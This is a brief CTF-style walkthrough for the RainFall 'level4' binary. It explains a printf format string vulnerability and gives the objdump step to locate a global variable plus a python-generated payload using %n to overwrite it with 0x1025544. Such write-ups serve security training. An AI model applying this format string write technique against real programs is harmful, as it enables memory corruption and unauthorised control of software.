ytaousi/RainFall/level4/walktrough.md

 ```
 the function n() takes user input and pass it to the function p()
 the funtion p() print it back using printf() whitout using format string we can start printing values from the stack

+then the program cheks the value of the variable m if its equald to 0x1025544(16930116 in decimal)
+using objdump -t ./level4 | grep "m"   <-> address of the variable m in the bss section we get the addres of the variable m

+then using our n modifier we can fill the adress of the variable m with the length of our desired data so that is mets the condition our program is testing

+python -c 'print "\x10\x98\x04\x08" + "%16930112d" + "%12$n"' > /tmp/exploit4

+cat /tmp/exploit4 | ./level4
 ```